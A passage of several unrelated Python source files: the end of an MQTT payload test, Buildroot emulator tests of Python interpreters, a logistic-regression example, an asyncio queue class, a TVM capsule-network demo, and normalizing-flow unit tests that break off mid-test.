        ('false', False),
        ('False', False),
        ('1', 1),
        ('-1', -1),
        ('0.1', 0.1),
        ('-0.1', -0.1),
        ('asdf', 'asdf'),
        ('[asdf]', '[asdf]'),
        (b'\x07\x07', '\x07\x07'),
    )
)
def test_value_cast(payload, expected):
    # MQTTMessage carries a bytes payload, so str inputs are encoded first.
    msg = MQTTMessage(topic=b'test_topic')
    msg.payload = payload.encode('utf-8') if not isinstance(payload, bytes) else payload
    assert get_msg_payload(msg) == ('test_topic', expected)
|
11520131
|
import os
import infra.basetest
class TestPythonBase(infra.basetest.BRTest):
    """Boot a minimal cpio-based armv5 image and smoke-test its Python interpreter."""

    config = infra.basetest.BASIC_TOOLCHAIN_CONFIG + \
        """
        BR2_TARGET_ROOTFS_CPIO=y
        # BR2_TARGET_ROOTFS_TAR is not set
        """
    interpreter = "python"

    def login(self):
        """Boot the emulator with the generated initrd and log in."""
        cpio_file = os.path.join(self.builddir, "images", "rootfs.cpio")
        self.emulator.boot(arch="armv5",
                           kernel="builtin",
                           options=["-initrd", cpio_file])
        self.emulator.login()

    def version_test(self, version, timeout=-1):
        """Check that `--version` output starts with the expected string."""
        cmd = "{} --version 2>&1 | grep '^{}'".format(self.interpreter, version)
        _, exit_code = self.emulator.run(cmd, timeout)
        self.assertEqual(exit_code, 0)

    def math_floor_test(self, timeout=-1):
        """The math module must be importable and usable."""
        cmd = self.interpreter + " -c 'import math; math.floor(12.3)'"
        _, exit_code = self.emulator.run(cmd, timeout)
        self.assertEqual(exit_code, 0)

    def libc_time_test(self, timeout=-1):
        """Call into libc via ctypes to verify the FFI works on target."""
        cmd = self.interpreter + " -c 'from __future__ import print_function;"
        cmd += "import ctypes;"
        cmd += "libc = ctypes.cdll.LoadLibrary(\"libc.so.1\");"
        cmd += "print(libc.time(None))'"
        _, exit_code = self.emulator.run(cmd, timeout)
        self.assertEqual(exit_code, 0)

    def zlib_test(self, timeout=-1):
        """zlib is expected to be absent in this config, so import must fail."""
        cmd = self.interpreter + " -c 'import zlib'"
        _, exit_code = self.emulator.run(cmd, timeout)
        self.assertEqual(exit_code, 1)
class TestPython2(TestPythonBase):
    """Run the base interpreter smoke tests against the python 2.x package."""

    config = TestPythonBase.config + \
        """
        BR2_PACKAGE_PYTHON=y
        """

    def test_run(self):
        self.login()
        self.version_test("Python 2")
        for check in (self.math_floor_test, self.libc_time_test, self.zlib_test):
            check()
class TestPython3(TestPythonBase):
    """Run the base interpreter smoke tests against the python3 package."""

    config = TestPythonBase.config + \
        """
        BR2_PACKAGE_PYTHON3=y
        """

    def test_run(self):
        self.login()
        self.version_test("Python 3")
        for check in (self.math_floor_test, self.libc_time_test, self.zlib_test):
            check()
class TestPythonPackageBase(TestPythonBase):
    """Common class to test a python package.

    Build an image containing the scripts listed in sample_scripts, start the
    emulator, login to it and for each sample script in the image run the
    python interpreter passing the name of the script and check the status
    code is 0.

    Each test case that inherits from this class must have:
        __test__ = True - to let nose2 know that it is a test case
        config - defconfig fragment with the packages to run the test
    It also can have:
        sample_scripts - list of scripts to add to the image and run on the
                         target
        timeout - timeout to the script to run when the default from the
                  test infra is not enough
    When custom commands need be issued on the target the method
    run_sample_scripts can be overridden.
    """
    __test__ = False

    config_sample_scripts = \
        """
        BR2_ROOTFS_POST_BUILD_SCRIPT="{}"
        BR2_ROOTFS_POST_SCRIPT_ARGS="{}"
        """.format(infra.filepath("tests/package/copy-sample-script-to-target.sh"),
                   "{sample_scripts}")
    sample_scripts = None
    timeout = -1

    def __init__(self, names):
        """Append the sample scripts to the image config at construction time."""
        super(TestPythonPackageBase, self).__init__(names)
        if self.sample_scripts:
            paths = [infra.filepath(s) for s in self.sample_scripts]
            self.config += self.config_sample_scripts.format(sample_scripts=" ".join(paths))

    def check_sample_scripts_exist(self):
        """Verify every sample script was really copied into the image."""
        names = [os.path.basename(s) for s in self.sample_scripts]
        _, exit_code = self.emulator.run("md5sum " + " ".join(names))
        self.assertEqual(exit_code, 0)

    def run_sample_scripts(self):
        """Run each sample script on the target and expect exit code 0."""
        for script in self.sample_scripts:
            command = "{} {}".format(self.interpreter, os.path.basename(script))
            _, exit_code = self.emulator.run(command, timeout=self.timeout)
            self.assertEqual(exit_code, 0)

    def test_run(self):
        self.login()
        self.check_sample_scripts_exist()
        self.run_sample_scripts()
|
11520149
|
from showml.losses import BinaryCrossEntropy
from showml.optimizers import RMSProp
from showml.linear_model.regression import LogisticRegression
from showml.utils.dataset import Dataset
from showml.losses.metrics import accuracy, binary_cross_entropy
from showml.utils.data_loader import load_wine
# Train a logistic-regression binary classifier on the wine dataset with
# RMSProp on a binary cross-entropy loss, then plot the tracked metrics.
X_train, y_train = load_wine()
dataset = Dataset(X_train, y_train)
model = LogisticRegression()
optimizer = RMSProp()
model.compile(
    optimizer=optimizer,
    loss=BinaryCrossEntropy(),
    metrics=[binary_cross_entropy, accuracy],
)
model.fit(dataset, batch_size=64, epochs=2000)
model.plot_metrics()
|
11520178
|
import asyncio
class Streams:
    """Bidirectional message channel: one asyncio queue per direction."""

    def __init__(self):
        # Independent unbounded queues for incoming and outgoing items.
        self.inbox, self.outbox = asyncio.Queue(), asyncio.Queue()
|
11520182
|
import tvm
import time
import numpy as np
import torch
import random
from tvm.tensor_graph.testing.models import capsule_tg as capsule
from tvm.tensor_graph.testing.pytorch_examples import resnet_annotated
from tvm.tensor_graph.nn.layers import Layer, Conv2d, BatchNorm2d, ReLU, \
AvgPool2d, GlobalAvgPool2d, Linear, Sequential
from tvm.tensor_graph.core import ForwardGraph, BackwardGraph, compute, \
GraphTensor, GraphOp, PyTIRGraph
from tvm.tensor_graph.nn import MarginLoss, SGD
from tvm.tensor_graph.core.schedule_generator import ConnectedSet, GPUScheduleBaseSet, \
GPUScheduleMasterBaseSet, form_connected_sets, GPUScheduleMasterSet, \
SingleCut, form_cut_candidates, LayoutTransform
from tvm.tensor_graph.core.utils import flatten_tir_graph
from tvm.tensor_graph.core.space import PrimitiveSpace, PartitionSpace, ForwardGraphSpace
from tvm.tensor_graph.core.tuner import RandomPrimitiveTuner, RandomPartitionTuner, RandomForwardTuner
# Experiment configuration shared by test1()/test2() below.
batch = 21      # batch size
num_cap = 33    # number of capsules passed to capsule.get_model
channel = 1     # single-channel (grayscale) input
hw = 28         # input height/width (MNIST-sized) — presumably; confirm with model
img_shape = [batch, channel, hw, hw]
num_classes = 10
label_shape = [batch, num_classes]  # one-hot labels
def test1():
    """Build the capsule model and print each of its weight tensors."""
    print("test 1 ##############################")
    net = capsule.get_model(batch, num_cap)
    print("The parameters in capsule")
    for weight in net.weights():
        print(weight)
def test2():
    """End-to-end capsule-network training-step demo on the TVM tensor-graph API.

    Builds the forward graph, differentiates it with MarginLoss/SGD, compiles
    both a monolithic function and a partitioned PyTIRGraph for LLVM, runs one
    step with random data, and prints the resulting loss and gradients.
    NOTE(review): statement order matters throughout — graph construction,
    scheduling, buffer allocation and execution are strictly sequential.
    """
    print("test 2 ##############################")
    dtype = "float32"
    img_tensor = GraphTensor(img_shape, dtype=dtype, name="image")
    label_tensor = GraphTensor(label_shape, dtype=dtype, name="label")
    model = capsule.get_model(batch, num_cap)
    # get output_tensor
    output_tensor = model(img_tensor)
    # get the weights tensors
    weights_tensors = []
    for w in model.weights():
        weights_tensors.append(w)
        print(w.shape)
    print("len(weights_tensors):", len(weights_tensors))
    # this is data: random image batch and random one-hot labels
    img_np = np.random.uniform(-1, 1, img_shape).astype(dtype)
    random_onehot_label = []
    for b in range(0, batch):
        random_onehot_label.append(random.randint(0, num_classes-1))
    label_np_torch = torch.tensor(random_onehot_label)
    label_np = np.eye(num_classes)[random_onehot_label].astype(dtype)
    print("random_onehot_label", random_onehot_label)
    print("label_np_torch", label_np_torch)
    print("lable_np", label_np)
    margin_loss = MarginLoss(label_tensor)
    sgd = SGD(1)
    fwd_graph = ForwardGraph([img_tensor], [output_tensor], weights_tensors)
    # #change data layout
    # forward_space = ForwardGraphSpace()
    # forward_tuner = RandomForwardTuner(forward_space)
    # layout_generator = LayoutTransform(fwd_graph, forward_space, forward_tuner)
    # fgraph = layout_generator.generate()
    fgraph = fwd_graph
    # autodiff: derive the backward graph (loss + gradients + SGD updates)
    bgraph = fgraph.make_backward(margin_loss, sgd)
    sch, bufs = bgraph.create_schedule()
    # print(tvm.lower(sch, bufs, simple_mode=True))
    target = "llvm"
    dev = 0
    naive_func = bgraph.build(sch, bufs, target)
    # make tir graph
    inputs = [x.tvm_tensor for x in bgraph.inputs]
    weights = [x.tvm_tensor for x in bgraph.weights]
    outputs = [x.tvm_tensor for x in bgraph.outputs]
    labels = [x.tvm_tensor for x in bgraph.labels]
    loss = bgraph.loss.tvm_tensor
    gradients = [x.tvm_tensor for x in bgraph.gradients]
    updates = [x.tvm_tensor for x in bgraph.updates]
    # labels = []
    # loss = None
    # gradients = []
    # updates = []
    tgraph = PyTIRGraph(
        [x.tvm_tensor for x in bgraph.inputs],
        [x.tvm_tensor for x in bgraph.labels],
        [x.tvm_tensor for x in bgraph.outputs],
        [x.tvm_tensor for x in bgraph.weights],
        bgraph.loss.tvm_tensor,
        [x.tvm_tensor for x in bgraph.gradients],
        bgraph.lr.tvm_tensor,
        [x.tvm_tensor for x in bgraph.updates])
    print("after tir graph")
    # apply config
    # 1. modify op stat list -> head, tail
    # 2. make subgraphs
    tgraph.partition_graph()
    # 3. create schedule
    tgraph.create_schedule()
    # 4. modify schedule
    tgraph.build(target)
    # allocate buffer
    # only the first call has effect
    lr_np = sgd.get_lr().astype("float32")
    tgraph.set_inputs({bgraph.inputs[0].tvm_tensor: img_np})
    tgraph.set_labels({bgraph.labels[0].tvm_tensor: label_np})
    tgraph.set_lr(lr_np)
    tgraph.allocate_buffer(target, dev)
    ctx = tvm.context(target, dev)
    # copy the data (do not use reference)
    A_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.inputs[0].tvm_tensor).asnumpy(), ctx)
    label_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.labels[0].tvm_tensor).asnumpy(), ctx)
    weights_tvm = [tvm.nd.array(tgraph.get_tvm_array(x.tvm_tensor).asnumpy(), ctx) for x in bgraph.weights]
    # B_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.weights[0].tvm_tensor).asnumpy(), ctx)
    # bias_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.weights[1].tvm_tensor).asnumpy(), ctx)
    # E_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.weights[2].tvm_tensor).asnumpy(), ctx)
    lr_tvm = tvm.nd.array(tgraph.get_tvm_array(bgraph.lr.tvm_tensor).asnumpy(), ctx)
    updates_tvm = [tvm.nd.array(x.asnumpy(), ctx) for x in tgraph.get_updates()]
    # run the monolithic (un-partitioned) compiled function once
    naive_func(A_tvm, label_tvm, *weights_tvm, lr_tvm, *updates_tvm)
    print("naive_func successful!")
    # # subgraph partition
    # partition_space = PartitionSpace()
    # partition_tuner = RandomPartitionTuner(partition_space)
    # cut_candidates = form_cut_candidates(tgraph)
    # # print(cut_candidates)
    # for i, candidate in enumerate(cut_candidates):
    #   name = "graph_cut_" + str(i)
    #   partition_generator = SingleCut(tgraph, name, candidate, partition_space, partition_tuner)
    #   partition_generator.generate()
    # # for op, stat in tgraph.op_stat_dict.items():
    # #   print(op, " head=", stat.head)
    # tgraph.partition_graph()
    print("num subgraphs:", len(tgraph.subgraphs))
    np_weight = []
    for item in tgraph.get_updates():
        np_weight.append(item.asnumpy())
    # print("------------BEFORE FUNC----------------")
    # print("Checking loss!")
    # print(tgraph.get_loss(0).asnumpy())
    # print("Checking Gradients!")
    # for item in tgraph.get_gradients():
    #   print(item.asnumpy())
    # print("checking weight")
    # for item in tgraph.get_updates():
    #   print(item.asnumpy())
    # print("------------------------------")
    # execute every compiled subgraph in topological call order
    for mark in tgraph.call_order:
        print("enter once")
        func = tgraph.functions[mark]
        bufs = tgraph.bufs[mark]
        print("bufs", bufs)
        print("--------")
        print("tgraph.subgraphs[mark].index:", tgraph.subgraphs[mark].index)
        print("----------")
        print("tgraph.subgraphs[mark].index.keys():", tgraph.subgraphs[mark].index.keys())
        real_bufs = [tgraph.tvm_array_dict[tgraph.subgraphs[mark].index[x]] for x in bufs]
        print("I am here before func")
        func(*real_bufs)
        #print("I am here after func")
    print("------------AFTER FUNC----------------")
    print("Checking loss!")
    print(tgraph.get_loss(0).asnumpy())
    print("Checking Gradients!")
    for item in tgraph.get_gradients():
        print(item.asnumpy())
# Run both demos when executed as a script (test2 depends on globals only,
# not on test1).
if __name__ == "__main__":
    test1()
    test2()
|
11520191
|
import unittest
from scipy.stats import norm
import warnings
import pickle
import tensorflow as tf
import sys
import os
import numpy as np
import scipy.stats as stats
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from cde.density_estimator import NormalizingFlowEstimator
from cde.density_estimator.normalizing_flows import InvertedPlanarFlow, AffineFlow, IdentityFlow, InvertedRadialFlow
class TestFlows(unittest.TestCase):
    """Unit tests for the individual normalizing-flow bijectors.

    Runs in TF1 graph mode; each estimator registers uniquely named
    variables in the global graph, so model names must stay distinct.
    """
    def test_planar_invertibel(self):
        # Invertibility condition for planar flows: w^T û > -1 for all rows.
        with tf.Session() as sess:
            u = tf.constant([[-2.], [1.], [10.], [2.]])
            w = tf.constant([[80.], [-1.], [1.], [1.]])
            # Compute w * û
            inv = sess.run(w * InvertedPlanarFlow._u_circ(u, w))
            for i in inv:
                self.assertGreater(i, -1.)
    def test_affine_shift_and_scale(self):
        # An affine flow with params [0., 3.] should reproduce N(3, 1).
        with tf.Session() as sess:
            base_dist = tf.distributions.Normal(loc=0., scale=1.)
            # shift the distribution three to the right
            transf_dist = tf.distributions.Normal(loc=3., scale=1.)
            flow = AffineFlow(tf.constant([[0., 3.]]), 1)
            flow_dist = tf.contrib.distributions.TransformedDistribution(distribution=base_dist, bijector=flow)
            # eval the samples so they stay constant
            samples = sess.run(base_dist.sample([1000]))
            # the output is of shape (?, 1) so it needs to be squeezed
            pdf_estimate = tf.squeeze(flow_dist.prob(samples))
            pdf_actual = transf_dist.prob(samples)
            pdf_estimate, pdf_actual = sess.run([pdf_estimate, pdf_actual])
            self.assertLessEqual(np.mean(np.abs(pdf_actual - pdf_estimate)), 0.1)
    def _test_flow_correct_dims_NN(self, flow_name):
        """
        General structure:
        flow_params = MLP(x)
        pdf(y|x) = flow(y, flow_params)
        The tensor being transformed (=y) are of shape (batch_size, event_dims)
        - batch_size = len(x) == len(y)
        - event_dims = rank(y)
        For each element of x, the MLP outputs one parametrization for the flows
        for each of these parameters, the flow transforms one element of y
        therefore len(x) == len(y)
        the event dimension describes the rank of the base probability distribution that's being transformed
        Tensorflow's MultivariateNormal doesn't implement a CDF. Therefore we switch to a Normal for 1-D Problems
        Caveat:
        MultivariateNormal PDF output shape: (batch_size, )
        UnivariateNormal PDF output shape: (batch_size, 1)
        Therefore we adapt the output shape of the ildj to be (batch_size, 1) for 1-D, (batch_size, ) for N-D
        The flows are transforming tensors (batch_size, event_size)
        Forward: (batch_size, event_size) -> (batch_size, event_size)
        Inverse: (batch_size, event_size) -> (batch_size, event_size)
        ILDJ: (batch_size, event_size) -> (batch_size, 1) [1-D] or (batch_size, ) [N-D]
        This forms a transformed distribution:
        Sample: -> (batch_size, event_size)
        PDF: (batch_size, event_size) -> (batch_size, 1) [1-D] or (batch_size, ) [N-D]
        CDF: (batch_size, event_size) -> (batch_size, 1) [EXISTS ONLY FOR 1-D!]
        """
        tests = [
            {
                'x': [[1.], [0.], [2.], [4.], [1.]],
                'y': [[1.], [0.], [2.], [3.], [1.]],
                'ndim_x': 1,
                'ndim_y': 1
            },
            {
                'x': [[1., 1.], [0., 0.], [2., 2.], [4., 4.], [1., 1.]],
                'y': [[1., 1.], [0., 0.], [2., 2.], [3., 3.], [1., 1.]],
                'ndim_x': 2,
                'ndim_y': 2
            }
        ]
        with tf.Session() as sess:
            for test in tests:
                model = NormalizingFlowEstimator('nf_dimtest_' + flow_name + str(tests.index(test)),
                                                 test['ndim_x'], test['ndim_y'],
                                                 random_seed=22, n_training_epochs=2,
                                                 flows_type=(flow_name,))
                x, y = np.array(test['x']), np.array(test['y'])
                model.fit(x, y)
                p = model.pdf(x, y)
                self.assertEqual(p.shape, (len(y),))
                # every test has equal first and last elements; these are basic sanity tests
                self.assertAlmostEqual(p[0], p[-1], places=5)
                self.assertNotAlmostEqual(p[0], p[1], places=5)
    def _test_flow_correct_dims(self, flow_class):
        # Checks inverse / ILDJ / prob output shapes of a raw flow class
        # for both a 1-D and a 2-D event space (see docstring above).
        tests = [
            ([[1.], [2.], [1.]], 1),
            ([[1., 1.], [2., 2.], [1., 1.]], 2),
        ]
        with tf.Session() as sess:
            for test in tests:
                y, event_dims = test
                batch_size = len(y)
                y = np.array(y, dtype=np.float32)
                if event_dims == 1:
                    base_dist = tf.distributions.Normal(loc=0., scale=1.)
                else:
                    base_dist = tf.contrib.distributions.MultivariateNormalDiag(loc=[0.] * event_dims,
                                                                                scale_diag=[1.] * event_dims)
                params = tf.ones(shape=(batch_size, flow_class.get_param_size(event_dims)))
                flow = flow_class(params, event_dims)
                flow_dist = tf.contrib.distributions.TransformedDistribution(distribution=base_dist, bijector=flow)
                # reverse should transform (batch_size, event_dims) -> (batch_size, event_dims)
                self.assertEqual(y.shape, (batch_size, event_dims))
                inverse_y = flow.inverse(y).eval()
                self.assertEqual(inverse_y.shape, (batch_size, event_dims))
                # ildj is a reduction over event_dims
                # therefore transforms: (batch_size, event_dims) -> (batch_size, 1)
                self.assertEqual(y.shape, (batch_size, event_dims))
                ildj_y = flow.inverse_log_det_jacobian(y).eval()
                if event_dims == 1:
                    self.assertEqual(ildj_y.shape, (batch_size, 1))
                else:
                    self.assertEqual(ildj_y.shape, (batch_size,))
                # probability: (batch_size, event_dims) -> (batch_size, 1)
                self.assertEqual(y.shape, (batch_size, event_dims))
                p = flow_dist.prob(y).eval()
                if event_dims == 1:
                    self.assertEqual(p.shape, (batch_size, 1))
                else:
                    self.assertEqual(p.shape, (batch_size,))
                # the first and last elements of every test are the same; this is a basic sanity test
                self.assertEqual(p[0], p[2])
                self.assertNotEqual(p[0], p[1])
    def test_affine_flow_correct_dimension(self):
        self._test_flow_correct_dims(AffineFlow)
        self._test_flow_correct_dims_NN('affine')
    def test_identity_flow_correct_dimension(self):
        self._test_flow_correct_dims(IdentityFlow)
        # we don't test NN dimensions for the Identity flow as it contains no trainable variables
    def test_planar_flow_correct_dimension(self):
        self._test_flow_correct_dims(InvertedPlanarFlow)
        self._test_flow_correct_dims_NN('planar')
    def test_radial_flow_correct_dimension(self):
        self._test_flow_correct_dims(InvertedRadialFlow)
        self._test_flow_correct_dims_NN('radial')
class Test_NF_2d_gaussian(unittest.TestCase):
    """Fit each flow type to correlated Gaussian samples and compare the
    estimated conditional pdf against the analytic normal density."""
    def get_samples(self, mu=2, std=1.0):
        """Return 2000 paired samples (X, Y) from N(mu, std) with fixed seed."""
        np.random.seed(22)
        data = np.random.normal([mu, mu], std, size=(2000, 2))
        X = data[:, 0]
        Y = data[:, 1]
        return X, Y
    def test_NF_radial_with_2d_gaussian(self):
        mu = 200
        std = 23
        X, Y = self.get_samples(mu=mu, std=std)
        model = NormalizingFlowEstimator("nf_estimator_2d_radial", 1, 1, flows_type=('radial',),
                                         n_training_epochs=500, random_seed=22)
        model.fit(X, Y)
        # evaluate the pdf on a grid of +-3 std around the mean
        y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
        x = np.asarray([mu for i in range(y.shape[0])])
        p_est = model.pdf(x, y)
        p_true = norm.pdf(y, loc=mu, scale=std)
        self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
    def test_NF_affine_with_2d_gaussian(self):
        mu = 3
        std = 2
        X, Y = self.get_samples(mu=mu, std=std)
        model = NormalizingFlowEstimator("nf_estimator_2d_affine", 1, 1, flows_type=('affine',),
                                         n_training_epochs=500, random_seed=22)
        model.fit(X, Y)
        y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
        x = np.asarray([mu for i in range(y.shape[0])])
        p_est = model.pdf(x, y)
        p_true = norm.pdf(y, loc=mu, scale=std)
        self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
    def test_NF_planar_with_2d_gaussian(self):
        mu = 200
        std = 23
        X, Y = self.get_samples(mu=mu, std=std)
        model = NormalizingFlowEstimator("nf_estimator_2d_planar", 1, 1, flows_type=('planar',),
                                         n_training_epochs=500, random_seed=22)
        model.fit(X, Y)
        y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
        x = np.asarray([mu for i in range(y.shape[0])])
        p_est = model.pdf(x, y)
        p_true = norm.pdf(y, loc=mu, scale=std)
        self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
    def test_NF_identitiy_with_2d_gaussian(self):
        # Appending an identity flow should leave the estimate (nearly) unchanged.
        mu = 200
        std = 23
        X, Y = self.get_samples(mu=mu, std=std)
        model1 = NormalizingFlowEstimator("nf_estimator_2d_planar_no_id", 1, 1, flows_type=('planar',),
                                          n_training_epochs=50, random_seed=22)
        model2 = NormalizingFlowEstimator("nf_estimator_2d_planar_id", 1, 1, flows_type=('planar', 'identity'),
                                          n_training_epochs=50, random_seed=22)
        model1.fit(X, Y)
        model2.fit(X, Y)
        y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
        x = np.asarray([mu for i in range(y.shape[0])])
        p = model1.pdf(x, y)
        p_id = model2.pdf(x, y)
        self.assertLessEqual(np.mean(np.abs(p - p_id)), 0.01)
    def test_NF_chain_with_2d_gaussian(self):
        mu = 200
        std = 23
        X, Y = self.get_samples(mu=mu, std=std)
        model = NormalizingFlowEstimator("nf_estimator_2d_chain", 1, 1, flows_type=('planar', 'radial'),
                                         n_training_epochs=500, random_seed=22)
        model.fit(X, Y)
        y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
        x = np.asarray([mu for i in range(y.shape[0])])
        p_est = model.pdf(x, y)
        p_true = norm.pdf(y, loc=mu, scale=std)
        self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
    def test_NF_radial_with_2d_gaussian2(self):
        mu = -5
        std = 2.5
        X, Y = self.get_samples(mu=mu, std=std)
        model = NormalizingFlowEstimator("nf_estimator_2d_radial_2", 1, 1, flows_type=('radial',),
                                         n_training_epochs=500, random_seed=22)
        model.fit(X, Y)
        y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
        x = np.asarray([mu for i in range(y.shape[0])])
        p_est = model.pdf(x, y)
        p_true = norm.pdf(y, loc=mu, scale=std)
        self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
    def test_NF_chain_with_2d_gaussian2(self):
        mu = -5
        std = 2.5
        X, Y = self.get_samples(mu=mu, std=std)
        model = NormalizingFlowEstimator("nf_estimator_2d_chain_2", 1, 1, flows_type=('affine', 'planar', 'planar'),
                                         n_training_epochs=1000, random_seed=22)
        model.fit(X, Y)
        y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
        x = np.asarray([mu for i in range(y.shape[0])])
        p_est = model.pdf(x, y)
        p_true = norm.pdf(y, loc=mu, scale=std)
        self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
    def test_NF_chain2_with_2d_gaussian2(self):
        mu = -5
        std = 2.5
        X, Y = self.get_samples(mu=mu, std=std)
        model = NormalizingFlowEstimator("nf_estimator_2d_chain2_2", 1, 1, flows_type=('radial', 'planar', 'radial'),
                                         n_training_epochs=500, random_seed=22)
        model.fit(X, Y)
        y = np.arange(mu - 3 * std, mu + 3 * std, 6 * std / 20)
        x = np.asarray([mu for i in range(y.shape[0])])
        p_est = model.pdf(x, y)
        p_true = norm.pdf(y, loc=mu, scale=std)
        self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
class TestMultiModal(unittest.TestCase):
    """
    This tests whether the flows can model multimodal distributions
    The distributions used aren't actually conditional distributions
    """
    def test_bi_modal_planar_chain(self):
        """Fit an affine+planar chain to a two-component Gaussian mixture."""
        with tf.Session() as sess:
            bimix_gauss = tf.contrib.distributions.Mixture(
                cat=tf.distributions.Categorical(probs=[0.5, 0.5]),
                components=[
                    tf.distributions.Normal(loc=-.4, scale=0.4),
                    tf.distributions.Normal(loc=+.4, scale=0.4),
                ])
            x = tf.distributions.Normal(loc=0., scale=1.).sample([5000])
            y = bimix_gauss.sample([5000])
            x, y = sess.run([x, y])
            model = NormalizingFlowEstimator("nf_estimator_bimodal_planar", 1, 1,
                                             flows_type=('affine', 'planar', 'planar', 'planar'),
                                             n_training_epochs=1000, random_seed=22)
            model.fit(x, y)
            p_est = model.pdf(x, y)
            p_true = sess.run(bimix_gauss.prob(y))
            self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
    def test_bi_modal_mixed_chain(self):
        """Fit an affine+radial chain to a two-component Gaussian mixture."""
        with tf.Session() as sess:
            bimix_gauss = tf.contrib.distributions.Mixture(
                cat=tf.distributions.Categorical(probs=[0.5, 0.5]),
                components=[
                    tf.distributions.Normal(loc=-.5, scale=0.4),
                    tf.distributions.Normal(loc=+.5, scale=0.4),
                ])
            x = tf.distributions.Normal(loc=0., scale=1.).sample([5000])
            y = bimix_gauss.sample([5000])
            x, y = sess.run([x, y])
            model = NormalizingFlowEstimator("nf_estimator_trimodal_chain", 1, 1,
                                             flows_type=('affine', 'radial', 'radial', 'radial'),
                                             n_training_epochs=1000, random_seed=22)
            model.fit(x, y)
            p_est = model.pdf(x, y)
            p_true = sess.run(bimix_gauss.prob(y))
            self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
    def test_tri_modal_radial_chain(self):
        """Fit a radial-only chain to a three-component Gaussian mixture."""
        with tf.Session() as sess:
            bimix_gauss = tf.contrib.distributions.Mixture(
                cat=tf.distributions.Categorical(probs=[0.3, 0.4, 0.3]),
                components=[
                    tf.distributions.Normal(loc=-1., scale=0.4),
                    tf.distributions.Normal(loc=0., scale=0.4),
                    tf.distributions.Normal(loc=+1., scale=0.4),
                ])
            x = np.ones(5000)
            y = sess.run(bimix_gauss.sample([5000]))
            model = NormalizingFlowEstimator("nf_estimator_bimodal_radial", 1, 1,
                                             flows_type=('radial', 'radial', 'radial'),
                                             n_training_epochs=1000, random_seed=22)
            model.fit(x, y)
            p_est = model.pdf(x, y)
            p_true = sess.run(bimix_gauss.prob(y))
            self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
class TestLogProbability(unittest.TestCase):
    """Consistency check between pdf() and log_pdf() of the estimator."""
    def test_NF_log_pdf(self):
        """exp(log_pdf) must match pdf on fresh 3-D samples."""
        X, Y = np.random.normal(size=(1000, 3)), np.random.normal(size=(1000, 3))
        with tf.Session() as sess:
            model = NormalizingFlowEstimator("nf_logprob", 3, 3, flows_type=('affine', 'planar'),
                                             n_training_epochs=10, random_seed=22)
            model.fit(X, Y)
            x, y = np.random.normal(size=(1000, 3)), np.random.normal(size=(1000, 3))
            prob = model.pdf(x, y)
            log_prob = model.log_pdf(x, y)
            self.assertLessEqual(np.mean(np.abs(prob - np.exp(log_prob))), 0.001)
class TestRegularization(unittest.TestCase):
    """Tests for data normalization, noise regularization, weight decay and
    dropout options of the NormalizingFlowEstimator."""
    def get_samples(self, std=1.0, mean=2):
        """Return 2000 paired Gaussian samples (X, Y) with a fixed seed."""
        np.random.seed(22)
        data = np.random.normal([mean, mean], std, size=(2000, 2))
        X = data[:, 0]
        Y = data[:, 1]
        return X, Y
    def test_data_normalization(self):
        X, Y = self.get_samples(std=2, mean=20)
        with tf.Session() as sess:
            model = NormalizingFlowEstimator("nf_data_normalization", 1, 1, flows_type=('affine', 'radial', 'radial'),
                                             x_noise_std=None, y_noise_std=None, data_normalization=True,
                                             n_training_epochs=100)
            model.fit(X, Y)
            # test if data statistics were properly assigned to tf graph
            x_mean, x_std = model.sess.run([model.mean_x_sym, model.std_x_sym])
            print(x_mean, x_std)
            mean_diff = float(np.abs(x_mean - 20))
            std_diff = float(np.abs(x_std - 2))
            self.assertLessEqual(mean_diff, 0.5)
            self.assertLessEqual(std_diff, 0.5)
    def test_bi_modal_radial_chain_w_gaussian_noise(self):
        """Gaussian input/output noise should not prevent a good fit."""
        with tf.Session() as sess:
            bimix_gauss = tf.contrib.distributions.Mixture(
                cat=tf.distributions.Categorical(probs=[0.5, 0.5]),
                components=[
                    tf.distributions.Normal(loc=-1., scale=0.5),
                    tf.distributions.Normal(loc=+1., scale=0.5),
                ])
            x = np.ones(5000)
            y = sess.run(bimix_gauss.sample([5000]))
            model = NormalizingFlowEstimator("nf_estimator_bimodal_radial_gaussian", 1, 1,
                                             flows_type=('radial', 'radial', 'radial'),
                                             data_normalization=True, x_noise_std=0.1, y_noise_std=0.1,
                                             n_training_epochs=1000, random_seed=22)
            model.fit(x, y)
            p_est = model.pdf(x, y)
            p_true = sess.run(bimix_gauss.prob(y))
            self.assertLessEqual(np.mean(np.abs(p_true - p_est)), 0.1)
    def test_weight_decay(self):
        """Mild weight decay should still fit the bimodal target closely."""
        with tf.Session() as sess:
            bimix_gauss = tf.contrib.distributions.Mixture(
                cat=tf.distributions.Categorical(probs=[0.5, 0.5]),
                components=[
                    tf.distributions.Normal(loc=-1., scale=0.5),
                    tf.distributions.Normal(loc=+1., scale=0.5),
                ])
            x = np.ones(5000)
            y = sess.run(bimix_gauss.sample([5000]))
            model = NormalizingFlowEstimator("nf_estimator_weight_decay", 1, 1,
                                             flows_type=('affine', 'radial', 'radial'),
                                             data_normalization=True, weight_decay=0.0001, n_training_epochs=1000,
                                             random_seed=22)
            model.fit(x, y)
            p_est = model.pdf(x, y)
